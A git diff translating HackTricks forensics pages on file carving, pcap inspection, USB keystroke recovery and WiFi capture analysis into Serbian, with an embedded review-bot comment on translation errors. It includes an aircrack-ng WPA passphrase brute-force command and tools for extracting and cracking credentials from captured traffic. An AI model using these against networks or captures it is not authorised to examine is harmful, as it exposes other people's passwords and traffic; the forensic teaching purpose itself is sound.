-## References +## Reference - [https://en.wikipedia.org/wiki/GUID_Partition_Table](https://en.wikipedia.org/wiki/GUID_Partition_Table) - [http://ntfs.com/ntfs-permissions.htm](http://ntfs.com/ntfs-permissions.htm) - [https://www.osforensics.com/faqs-and-tutorials/how-to-scan-ntfs-i30-entries-deleted-files.html](https://www.osforensics.com/faqs-and-tutorials/how-to-scan-ntfs-i30-entries-deleted-files.html) - [https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service](https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service) -- **iHackLabs Certified Digital Forensics Windows** +- **iHackLabs Sertifikovani Digitalni Forenzik Windows** {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md b/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md index cd9e13a58..8ba8ba655 100644 --- a/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md +++ b/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md 
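Review bot: `sa smešnim podacima` mistranslates "junk data" (`smešan` means funny); use `nasumičnim` or `bezvrednim podacima`. `ukloniti kopije senki volumena` should keep the Windows feature name `Volume Shadow Copies`, since the reference list in this same hunk links Microsoft's Volume Shadow Copy Service page under that name. Finally, `iHackLabs Sertifikovani Digitalni Forenzik Windows` translates a certification title, which is a proper noun; keep `iHackLabs Certified Digital Forensics Windows`, consistent with the other reference entries that were left untouched.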
@@ -2,94 +2,86 @@ {{#include ../../../banners/hacktricks-training.md}} -## Carving & Recovery tools +## Alati za carving i oporavak -More tools in [https://github.com/Claudio-C/awesome-datarecovery](https://github.com/Claudio-C/awesome-datarecovery) +Više alata na [https://github.com/Claudio-C/awesome-datarecovery](https://github.com/Claudio-C/awesome-datarecovery) ### Autopsy -The most common tool used in forensics to extract files from images is [**Autopsy**](https://www.autopsy.com/download/). Download it, install it and make it ingest the file to find "hidden" files. Note that Autopsy is built to support disk images and other kinds of images, but not simple files. +Najčešće korišćen alat u forenzici za ekstrakciju fajlova iz slika je [**Autopsy**](https://www.autopsy.com/download/). Preuzmite ga, instalirajte i omogućite mu da unese fajl kako bi pronašao "sakrivene" fajlove. Imajte na umu da je Autopsy napravljen da podržava disk slike i druge vrste slika, ali ne i obične fajlove. ### Binwalk -**Binwalk** is a tool for analyzing binary files to find embedded content. It's installable via `apt` and its source is on [GitHub](https://github.com/ReFirmLabs/binwalk). - -**Useful commands**: +**Binwalk** je alat za analizu binarnih fajlova radi pronalaženja ugrađenog sadržaja. Može se instalirati putem `apt`, a njegov izvor je na [GitHub](https://github.com/ReFirmLabs/binwalk). +**Korisne komande**: ```bash sudo apt install binwalk #Insllation binwalk file #Displays the embedded data in the given file binwalk -e file #Displays and extracts some files from the given file binwalk --dd ".*" file #Displays and extracts all files from the given file ``` - ### Foremost -Another common tool to find hidden files is **foremost**. You can find the configuration file of foremost in `/etc/foremost.conf`. If you just want to search for some specific files uncomment them. If you don't uncomment anything foremost will search for its default configured file types. 
- +Još jedan uobičajen alat za pronalaženje skrivenih fajlova je **foremost**. Možete pronaći konfiguracioni fajl foremost-a u `/etc/foremost.conf`. Ako želite da pretražujete samo neke specifične fajlove, otkomentarišite ih. Ako ne otkomentarišete ništa, foremost će pretraživati svoje podrazumevane konfiguracione tipove fajlova. ```bash sudo apt-get install foremost foremost -v -i file.img -o output #Discovered files will appear inside the folder "output" ``` - ### **Scalpel** -**Scalpel** is another tool that can be used to find and extract **files embedded in a file**. In this case, you will need to uncomment from the configuration file (_/etc/scalpel/scalpel.conf_) the file types you want it to extract. - +**Scalpel** je još jedan alat koji se može koristiti za pronalaženje i ekstrakciju **datoteka ugrađenih u datoteku**. U ovom slučaju, potrebno je da odkomentarišete tipove datoteka iz konfiguracione datoteke (_/etc/scalpel/scalpel.conf_) koje želite da ekstraktujete. ```bash sudo apt-get install scalpel scalpel file.img -o output ``` - ### Bulk Extractor -This tool comes inside kali but you can find it here: [https://github.com/simsong/bulk_extractor](https://github.com/simsong/bulk_extractor) - -This tool can scan an image and will **extract pcaps** inside it, **network information (URLs, domains, IPs, MACs, mails)** and more **files**. You only have to do: +Ovaj alat dolazi unutar kali, ali ga možete pronaći ovde: [https://github.com/simsong/bulk_extractor](https://github.com/simsong/bulk_extractor) +Ovaj alat može skenirati sliku i **izvući pcaps** unutar nje, **mrežne informacije (URL-ovi, domene, IP adrese, MAC adrese, e-mailovi)** i još **datoteka**. 
Samo treba da uradite: ``` bulk_extractor memory.img -o out_folder ``` - -Navigate through **all the information** that the tool has gathered (passwords?), **analyse** the **packets** (read[ **Pcaps analysis**](../pcap-inspection/)), search for **weird domains** (domains related to **malware** or **non-existent**). +Navigirajte kroz **sve informacije** koje je alat prikupio (lozinke?), **analizirajte** **pakete** (pročitajte [**analizu Pcaps**](../pcap-inspection/)), pretražujte **čudne domene** (domene povezane sa **malverom** ili **nepostojećim**). ### PhotoRec -You can find it in [https://www.cgsecurity.org/wiki/TestDisk_Download](https://www.cgsecurity.org/wiki/TestDisk_Download) +Možete ga pronaći na [https://www.cgsecurity.org/wiki/TestDisk_Download](https://www.cgsecurity.org/wiki/TestDisk_Download) -It comes with GUI and CLI versions. You can select the **file-types** you want PhotoRec to search for. +Dolazi sa GUI i CLI verzijama. Možete odabrati **tipove fajlova** koje želite da PhotoRec pretražuje. ![](<../../../images/image (524).png>) ### binvis -Check the [code](https://code.google.com/archive/p/binvis/) and the [web page tool](https://binvis.io/#/). +Proverite [kod](https://code.google.com/archive/p/binvis/) i [web stranicu alata](https://binvis.io/#/). -#### Features of BinVis +#### Karakteristike BinVis -- Visual and active **structure viewer** -- Multiple plots for different focus points -- Focusing on portions of a sample -- **Seeing stings and resources**, in PE or ELF executables e. g. -- Getting **patterns** for cryptanalysis on files -- **Spotting** packer or encoder algorithms -- **Identify** Steganography by patterns -- **Visual** binary-diffing +- Vizuelni i aktivni **pregledač strukture** +- Više grafika za različite tačke fokusa +- Fokusiranje na delove uzorka +- **Prikazivanje stringova i resursa**, u PE ili ELF izvršnim datotekama npr. 
+- Dobijanje **šablona** za kriptoanalizu na fajlovima +- **Prepoznavanje** pakera ili enkodera +- **Identifikacija** steganografije po šablonima +- **Vizuelno** binarno upoređivanje -BinVis is a great **start-point to get familiar with an unknown target** in a black-boxing scenario. +BinVis je odlična **polazna tačka za upoznavanje sa nepoznatim ciljem** u scenariju crne kutije. -## Specific Data Carving Tools +## Specifični alati za vađenje podataka ### FindAES -Searches for AES keys by searching for their key schedules. Able to find 128. 192, and 256 bit keys, such as those used by TrueCrypt and BitLocker. +Pretražuje AES ključeve tražeći njihove rasporede ključeva. Sposoban je da pronađe 128, 192 i 256 bitne ključeve, kao što su oni koje koriste TrueCrypt i BitLocker. -Download [here](https://sourceforge.net/projects/findaes/). +Preuzmite [ovde](https://sourceforge.net/projects/findaes/). -## Complementary tools +## Komplementarni alati -You can use [**viu** ](https://github.com/atanunq/viu)to see images from the terminal.\ -You can use the linux command line tool **pdftotext** to transform a pdf into text and read it. +Možete koristiti [**viu**](https://github.com/atanunq/viu) da vidite slike iz terminala.\ +Možete koristiti linux komandnu liniju alat **pdftotext** da transformišete pdf u tekst i pročitate ga. {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md b/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md index f076c885c..a0a780c8c 100644 --- a/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md +++ b/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md 
@@ -1,74 +1,66 @@ {{#include ../../../banners/hacktricks-training.md}} -# Carving tools +# Alati za carving ## Autopsy -The most common tool used in forensics to extract files from images is [**Autopsy**](https://www.autopsy.com/download/). Download it, install it and make it ingest the file to find "hidden" files. Note that Autopsy is built to support disk images and other kind of images, but not simple files. +Najčešći alat korišćen u forenzici za ekstrakciju fajlova iz slika je [**Autopsy**](https://www.autopsy.com/download/). Preuzmite ga, instalirajte i omogućite mu da obradi fajl kako bi pronašao "sakrivene" fajlove. Imajte na umu da je Autopsy napravljen da podržava disk slike i druge vrste slika, ali ne i jednostavne fajlove. ## Binwalk -**Binwalk** is a tool for searching binary files like images and audio files for embedded files and data. -It can be installed with `apt` however the [source](https://github.com/ReFirmLabs/binwalk) can be found on github. -**Useful commands**: - +**Binwalk** je alat za pretraživanje binarnih fajlova kao što su slike i audio fajlovi za ugrađene fajlove i podatke. +Može se instalirati pomoću `apt`, međutim [izvor](https://github.com/ReFirmLabs/binwalk) se može pronaći na github-u. +**Korisne komande**: ```bash sudo apt install binwalk #Insllation binwalk file #Displays the embedded data in the given file binwalk -e file #Displays and extracts some files from the given file binwalk --dd ".*" file #Displays and extracts all files from the given file ``` - ## Foremost -Another common tool to find hidden files is **foremost**. You can find the configuration file of foremost in `/etc/foremost.conf`. If you just want to search for some specific files uncomment them. If you don't uncomment anything foremost will search for it's default configured file types. - +Još jedan uobičajen alat za pronalaženje skrivenih fajlova je **foremost**. Možete pronaći konfiguracioni fajl foremost-a u `/etc/foremost.conf`. 
Ako želite da pretražujete samo neke specifične fajlove, otkomentarišite ih. Ako ne otkomentarišete ništa, foremost će pretraživati svoje podrazumevane konfiguracione tipove fajlova. ```bash sudo apt-get install foremost foremost -v -i file.img -o output #Discovered files will appear inside the folder "output" ``` - ## **Scalpel** -**Scalpel** is another tool that can be use to find and extract **files embedded in a file**. In this case you will need to uncomment from the configuration file \(_/etc/scalpel/scalpel.conf_\) the file types you want it to extract. - +**Scalpel** je još jedan alat koji se može koristiti za pronalaženje i ekstrakciju **datoteka ugrađenih u datoteku**. U ovom slučaju, potrebno je da odkomentarišete tipove datoteka iz konfiguracione datoteke \(_/etc/scalpel/scalpel.conf_\) koje želite da ekstraktujete. ```bash sudo apt-get install scalpel scalpel file.img -o output ``` - ## Bulk Extractor -This tool comes inside kali but you can find it here: [https://github.com/simsong/bulk_extractor](https://github.com/simsong/bulk_extractor) - -This tool can scan an image and will **extract pcaps** inside it, **network information\(URLs, domains, IPs, MACs, mails\)** and more **files**. You only have to do: +Ovaj alat dolazi unutar kali, ali ga možete pronaći ovde: [https://github.com/simsong/bulk_extractor](https://github.com/simsong/bulk_extractor) +Ovaj alat može skenirati sliku i **izvući pcaps** unutar nje, **mrežne informacije (URL-ovi, domene, IP adrese, MAC adrese, e-mailovi)** i još **datoteka**. Samo treba da uradite: ```text bulk_extractor memory.img -o out_folder ``` - -Navigate through **all the information** that the tool has gathered \(passwords?\), **analyse** the **packets** \(read[ **Pcaps analysis**](../pcap-inspection/)\), search for **weird domains** \(domains related to **malware** or **non-existent**\). 
+Navigirajte kroz **sve informacije** koje je alat prikupio \(lozinke?\), **analizirajte** **pakete** \(pročitajte [ **analizu Pcaps**](../pcap-inspection/)\), pretražujte **čudne domene** \(domene povezane sa **malverom** ili **nepostojećim**\). ## PhotoRec -You can find it in [https://www.cgsecurity.org/wiki/TestDisk_Download](https://www.cgsecurity.org/wiki/TestDisk_Download) +Možete ga pronaći na [https://www.cgsecurity.org/wiki/TestDisk_Download](https://www.cgsecurity.org/wiki/TestDisk_Download) -It comes with GUI and CLI version. You can select the **file-types** you want PhotoRec to search for. +Dolazi sa GUI i CLI verzijom. Možete odabrati **tipove fajlova** koje želite da PhotoRec pretražuje. ![](../../../images/image%20%28524%29.png) -# Specific Data Carving Tools +# Specifični alati za vađenje podataka ## FindAES -Searches for AES keys by searching for their key schedules. Able to find 128. 192, and 256 bit keys, such as those used by TrueCrypt and BitLocker. +Pretražuje AES ključeve pretražujući njihove rasporede ključeva. Sposoban je da pronađe 128, 192 i 256 bitne ključeve, kao što su oni koje koriste TrueCrypt i BitLocker. -Download [here](https://sourceforge.net/projects/findaes/). +Preuzmite [ovde](https://sourceforge.net/projects/findaes/). -# Complementary tools +# Dodatni alati -You can use [**viu** ](https://github.com/atanunq/viu)to see images form the terminal. -You can use the linux command line tool **pdftotext** to transform a pdf into text and read it. +Možete koristiti [**viu** ](https://github.com/atanunq/viu) da vidite slike iz terminala. +Možete koristiti linux komandnu liniju **pdftotext** da transformišete pdf u tekst i pročitate ga. {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/forensics/basic-forensic-methodology/pcap-inspection/README.md b/src/forensics/basic-forensic-methodology/pcap-inspection/README.md index 9e6ebd08d..941ba753b 100644 
--- a/src/forensics/basic-forensic-methodology/pcap-inspection/README.md +++ b/src/forensics/basic-forensic-methodology/pcap-inspection/README.md @@ -1,32 +1,26 @@ -# Pcap Inspection +# Pcap Inspekcija {{#include ../../../banners/hacktricks-training.md}} -
- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - > [!NOTE] -> A note about **PCAP** vs **PCAPNG**: there are two versions of the PCAP file format; **PCAPNG is newer and not supported by all tools**. You may need to convert a file from PCAPNG to PCAP using Wireshark or another compatible tool, in order to work with it in some other tools. +> Napomena o **PCAP** vs **PCAPNG**: postoje dve verzije PCAP formata datoteka; **PCAPNG je noviji i nije podržan od svih alata**. Možda ćete morati da konvertujete datoteku iz PCAPNG u PCAP koristeći Wireshark ili neki drugi kompatibilni alat, kako biste mogli da radite s njom u nekim drugim alatima. -## Online tools for pcaps +## Online alati za pcaps -- If the header of your pcap is **broken** you should try to **fix** it using: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php) -- Extract **information** and search for **malware** inside a pcap in [**PacketTotal**](https://packettotal.com) -- Search for **malicious activity** using [**www.virustotal.com**](https://www.virustotal.com) and [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com) +- Ako je zaglavlje vašeg pcap-a **pokvareno**, trebali biste pokušati da ga **popravite** koristeći: [http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php) +- Ekstrahujte **informacije** i tražite **malver** unutar pcap-a u [**PacketTotal**](https://packettotal.com) +- Tražite **malicioznu aktivnost** koristeći [**www.virustotal.com**](https://www.virustotal.com) i [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com) -## Extract Information +## Ekstrakcija informacija -The following tools are useful to extract 
statistics, files, etc. +Sledeći alati su korisni za ekstrakciju statistike, datoteka, itd. ### Wireshark > [!NOTE] -> **If you are going to analyze a PCAP you basically must to know how to use Wireshark** +> **Ako planirate da analizirate PCAP, osnovno je da znate kako da koristite Wireshark** -You can find some Wireshark tricks in: +Možete pronaći neke Wireshark trikove u: {{#ref}} wireshark-tricks.md 
@@ -34,111 +28,93 @@ wireshark-tricks.md ### Xplico Framework -[**Xplico** ](https://github.com/xplico/xplico)_(only linux)_ can **analyze** a **pcap** and extract information from it. For example, from a pcap file Xplico, extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on. - -**Install** +[**Xplico** ](https://github.com/xplico/xplico)_(samo linux)_ može **analizirati** **pcap** i ekstraktovati informacije iz njega. Na primer, iz pcap datoteke Xplico, ekstraktuje svaku email poruku (POP, IMAP i SMTP protokoli), sav HTTP sadržaj, svaki VoIP poziv (SIP), FTP, TFTP, itd. +**Instalirajte** ```bash sudo bash -c 'echo "deb http://repo.xplico.org/ $(lsb_release -s -c) main" /etc/apt/sources.list' sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 791C25CE sudo apt-get update sudo apt-get install xplico ``` - -**Run** - +**Pokreni** ``` /etc/init.d/apache2 restart /etc/init.d/xplico start ``` +Pristupite _**127.0.0.1:9876**_ sa kredencijalima _**xplico:xplico**_ -Access to _**127.0.0.1:9876**_ with credentials _**xplico:xplico**_ - -Then create a **new case**, create a **new session** inside the case and **upload the pcap** file. +Zatim kreirajte **novi slučaj**, kreirajte **novu sesiju** unutar slučaja i **otpremite pcap** datoteku. ### NetworkMiner -Like Xplico it is a tool to **analyze and extract objects from pcaps**. It has a free edition that you can **download** [**here**](https://www.netresec.com/?page=NetworkMiner). It works with **Windows**.\ -This tool is also useful to get **other information analysed** from the packets in order to be able to know what was happening in a **quicker** way. +Kao Xplico, to je alat za **analizu i ekstrakciju objekata iz pcaps**. Ima besplatnu verziju koju možete **preuzeti** [**ovde**](https://www.netresec.com/?page=NetworkMiner). 
Radi sa **Windows**.\ +Ovaj alat je takođe koristan za dobijanje **druge analizirane informacije** iz paketa kako biste mogli brže saznati šta se dešava. ### NetWitness Investigator -You can download [**NetWitness Investigator from here**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(It works in Windows)**.\ -This is another useful tool that **analyses the packets** and sorts the information in a useful way to **know what is happening inside**. +Možete preuzeti [**NetWitness Investigator odavde**](https://www.rsa.com/en-us/contact-us/netwitness-investigator-freeware) **(Radi na Windows)**.\ +Ovo je još jedan koristan alat koji **analizira pakete** i sortira informacije na koristan način da **znate šta se dešava unutra**. ### [BruteShark](https://github.com/odedshimon/BruteShark) -- Extracting and encoding usernames and passwords (HTTP, FTP, Telnet, IMAP, SMTP...) -- Extract authentication hashes and crack them using Hashcat (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...) -- Build a visual network diagram (Network nodes & users) -- Extract DNS queries -- Reconstruct all TCP & UDP Sessions +- Ekstrakcija i kodiranje korisničkih imena i lozinki (HTTP, FTP, Telnet, IMAP, SMTP...) +- Ekstrakcija autentifikacionih hash-ova i njihovo razbijanje koristeći Hashcat (Kerberos, NTLM, CRAM-MD5, HTTP-Digest...) +- Izrada vizuelnog dijagrama mreže (Mrežni čvorovi i korisnici) +- Ekstrakcija DNS upita +- Rekonstrukcija svih TCP i UDP sesija - File Carving ### Capinfos - ``` capinfos capture.pcap ``` - ### Ngrep -If you are **looking** for **something** inside the pcap you can use **ngrep**. Here is an example using the main filters: - +Ako **tražite** **nešto** unutar pcap-a, možete koristiti **ngrep**. 
Evo primera koji koristi glavne filtre: ```bash ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.168 and src host 192.168" ``` +### Isečenje -### Carving - -Using common carving techniques can be useful to extract files and information from the pcap: +Korišćenje uobičajenih tehnika isečenja može biti korisno za ekstrakciju fajlova i informacija iz pcap: {{#ref}} ../partitions-file-systems-carving/file-data-carving-recovery-tools.md {{#endref}} -### Capturing credentials +### Hvatanje kredencijala -You can use tools like [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) to parse credentials from a pcap or a live interface. +Možete koristiti alate kao što su [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) za parsiranje kredencijala iz pcap-a ili sa aktivnog interfejsa. -
- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - -## Check Exploits/Malware +## Proverite Eksploite/Malver ### Suricata -**Install and setup** - +**Instalirajte i postavite** ``` apt-get install suricata apt-get install oinkmaster echo "url = http://rules.emergingthreats.net/open/suricata/emerging.rules.tar.gz" >> /etc/oinkmaster.conf oinkmaster -C /etc/oinkmaster.conf -o /etc/suricata/rules ``` - -**Check pcap** - +**Proveri pcap** ``` suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log ``` - ### YaraPcap -[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) is a tool that +[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) je alat koji -- Reads a PCAP File and Extracts Http Streams. -- gzip deflates any compressed streams -- Scans every file with yara -- Writes a report.txt -- Optionally saves matching files to a Dir +- Čita PCAP datoteku i ekstraktuje Http tokove. +- gzip dekompresuje sve kompresovane tokove +- Skandira svaku datoteku sa yara +- Piše report.txt +- Opcionalno čuva odgovarajuće datoteke u direktorijum ### Malware Analysis -Check if you can find any fingerprint of a known malware: +Proverite da li možete pronaći bilo koji otisak poznatog malvera: {{#ref}} ../malware-analysis.md 
@@ -146,12 +122,11 @@ Check if you can find any fingerprint of a known malware: ## Zeek -> [Zeek](https://docs.zeek.org/en/master/about.html) is a passive, open-source network traffic analyzer. Many operators use Zeek as a Network Security Monitor (NSM) to support investigations of suspicious or malicious activity. Zeek also supports a wide range of traffic analysis tasks beyond the security domain, including performance measurement and troubleshooting. +> [Zeek](https://docs.zeek.org/en/master/about.html) je pasivni, open-source analizator mrežnog saobraćaja. Mnogi operateri koriste Zeek kao Mrežni Sigurnosni Monitor (NSM) za podršku istragama sumnjivih ili zlonamernih aktivnosti. Zeek takođe podržava širok spektar zadataka analize saobraćaja van domena sigurnosti, uključujući merenje performansi i rešavanje problema. -Basically, logs created by `zeek` aren't **pcaps**. Therefore you will need to use **other tools** to analyse the logs where the **information** about the pcaps are. +U suštini, logovi koje kreira `zeek` nisu **pcaps**. Stoga ćete morati koristiti **druge alate** za analizu logova gde se nalaze **informacije** o pcaps. ### Connections Info - ```bash #Get info about longest connections (add "grep udp" to see only udp traffic) #The longest connection might be of malware (constant reverse shell?) @@ -201,9 +176,7 @@ Score,Source IP,Destination IP,Connections,Avg Bytes,Intvl Range,Size Range,Top 1,10.55.100.111,165.227.216.194,20054,92,29,52,1,52,7774,20053,0,0,0,0 0.838,10.55.200.10,205.251.194.64,210,69,29398,4,300,70,109,205,0,0,0,0 ``` - -### DNS info - +### DNS informacije ```bash #Get info about each DNS request performed cat dns.log | zeek-cut -c id.orig_h query qtype_name answers 
@@ -220,8 +193,7 @@ cat dns.log | zeek-cut qtype_name | sort | uniq -c | sort -nr #See top DNS domain requested with rita rita show-exploded-dns -H --limit 10 zeek_logs ``` - -## Other pcap analysis tricks +## Ostali trikovi analize pcap-a {{#ref}} dnscat-exfiltration.md @@ -237,10 +209,4 @@ usb-keystrokes.md ​ -
- -[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. - -{% embed url="https://www.rootedcon.com/" %} - {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md b/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md index 9f63fbab3..08879f2d9 100644 --- a/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md +++ b/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keyboard-pcap-analysis.md 
@@ -1,12 +1,12 @@ {{#include ../../../banners/hacktricks-training.md}} -If you have a pcap of a USB connection with a lot of Interruptions probably it is a USB Keyboard connection. +Ako imate pcap datoteku USB veze sa mnogo prekida, verovatno se radi o USB tastaturi. -A wireshark filter like this could be useful: `usb.transfer_type == 0x01 and frame.len == 35 and !(usb.capdata == 00:00:00:00:00:00:00:00)` +Wireshark filter poput ovog može biti koristan: `usb.transfer_type == 0x01 and frame.len == 35 and !(usb.capdata == 00:00:00:00:00:00:00:00)` -It could be important to know that the data that starts with "02" is pressed using shift. +Može biti važno znati da podaci koji počinju sa "02" predstavljaju pritisnuti taster uz pritisnut shift. -You can read more information and find some scripts about how to analyse this in: +Možete pročitati više informacija i pronaći neke skripte o tome kako analizirati ovo na: - [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4) - [https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup) diff --git a/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md b/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md index 9c3dba419..08adf63e1 100644 --- a/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md +++ b/src/forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md 
@@ -1,17 +1,15 @@ {{#include ../../../banners/hacktricks-training.md}} -If you have a pcap containing the communication via USB of a keyboard like the following one: +Ako imate pcap koji sadrži komunikaciju putem USB-a tastature kao što je sledeća: ![](<../../../images/image (613).png>) -You can use the tool [**ctf-usb-keyboard-parser**](https://github.com/carlospolop-forks/ctf-usb-keyboard-parser) to get what was written in the communication: - +Možete koristiti alat [**ctf-usb-keyboard-parser**](https://github.com/carlospolop-forks/ctf-usb-keyboard-parser) da dobijete ono što je napisano u komunikaciji: ```bash tshark -r ./usb.pcap -Y 'usb.capdata && usb.data_len == 8' -T fields -e usb.capdata | sed 's/../:&/g2' > keystrokes.txt python3 usbkeyboard.py ./keystrokes.txt ``` - -You can read more information and find some scripts about how to analyse this in: +Možete pročitati više informacija i pronaći neke skripte o tome kako analizirati ovo na: - [https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4](https://medium.com/@ali.bawazeeer/kaizen-ctf-2018-reverse-engineer-usb-keystrok-from-pcap-file-2412351679f4) - [https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup](https://github.com/tanc7/HacktheBox_Deadly_Arthropod_Writeup) diff --git a/src/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md b/src/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md index 36413cf70..54f5521e0 100644 --- a/src/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md +++ b/src/forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md 
@@ -1,8 +1,8 @@ {{#include ../../../banners/hacktricks-training.md}} -# Check BSSIDs +# Proverite BSSID-ove -When you receive a capture whose principal traffic is Wifi using WireShark you can start investigating all the SSIDs of the capture with _Wireless --> WLAN Traffic_: +Kada primite snimak čiji je glavni saobraćaj Wifi koristeći WireShark, možete početi da istražujete sve SSID-ove snimka sa _Wireless --> WLAN Traffic_: ![](<../../../images/image (424).png>) 
@@ -10,29 +10,27 @@ When you receive a capture whose principal traffic is Wifi using WireShark you c ## Brute Force -One of the columns of that screen indicates if **any authentication was found inside the pcap**. If that is the case you can try to Brute force it using `aircrack-ng`: - +Jedna od kolona na tom ekranu pokazuje da li je **bilo kakva autentifikacija pronađena unutar pcap-a**. Ako je to slučaj, možete pokušati da je brute force-ujete koristeći `aircrack-ng`: ```bash aircrack-ng -w pwds-file.txt -b file.pcap ``` +Na primer, dobiće WPA lozinku koja štiti PSK (pre shared-key), koja će biti potrebna za dekriptovanje saobraćaja kasnije. -For example it will retrieve the WPA passphrase protecting a PSK (pre shared-key), that will be required to decrypt the trafic later. +# Podaci u Beacon-ima / Sporedni Kanal -# Data in Beacons / Side Channel +Ako sumnjate da se **podaci curi unutar beacon-a Wifi mreže**, možete proveriti beacon-e mreže koristeći filter kao što je sledeći: `wlan contains `, ili `wlan.ssid == "NAMEofNETWORK"` pretražujući unutar filtriranih paketa za sumnjive stringove. -If you suspect that **data is being leaked inside beacons of a Wifi network** you can check the beacons of the network using a filter like the following one: `wlan contains `, or `wlan.ssid == "NAMEofNETWORK"` search inside the filtered packets for suspicious strings. 
+# Pronađite Nepoznate MAC Adrese u Wifi Mreži -# Find Unknown MAC Addresses in A Wifi Network - -The following link will be useful to find the **machines sending data inside a Wifi Network**: +Sledeći link će biti koristan za pronalaženje **mašina koje šalju podatke unutar Wifi mreže**: - `((wlan.ta == e8:de:27:16:70:c9) && !(wlan.fc == 0x8000)) && !(wlan.fc.type_subtype == 0x0005) && !(wlan.fc.type_subtype ==0x0004) && !(wlan.addr==ff:ff:ff:ff:ff:ff) && wlan.fc.type==2` -If you already know **MAC addresses you can remove them from the output** adding checks like this one: `&& !(wlan.addr==5c:51:88:31:a0:3b)` +Ako već znate **MAC adrese, možete ih ukloniti iz izlaza** dodajući provere kao što je ova: `&& !(wlan.addr==5c:51:88:31:a0:3b)` -Once you have detected **unknown MAC** addresses communicating inside the network you can use **filters** like the following one: `wlan.addr== && (ftp || http || ssh || telnet)` to filter its traffic. Note that ftp/http/ssh/telnet filters are useful if you have decrypted the traffic. +Kada detektujete **nepoznate MAC** adrese koje komuniciraju unutar mreže, možete koristiti **filtre** kao što je sledeći: `wlan.addr== && (ftp || http || ssh || telnet)` da filtrirate njihov saobraćaj. Imajte na umu da su ftp/http/ssh/telnet filteri korisni ako ste dekriptovali saobraćaj. -# Decrypt Traffic +# Dekriptovanje Saobraćaja Edit --> Preferences --> Protocols --> IEEE 802.11--> Edit diff --git a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md index ec397e99a..026c10b2a 100644 --- a/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md +++ b/src/forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md 
@@ -1,77 +1,61 @@ -# Decompile compiled python binaries (exe, elf) - Retreive from .pyc +# Decompilacija kompajliranih python binarnih fajlova (exe, elf) - Preuzimanje iz .pyc {{#include ../../../banners/hacktricks-training.md}} -
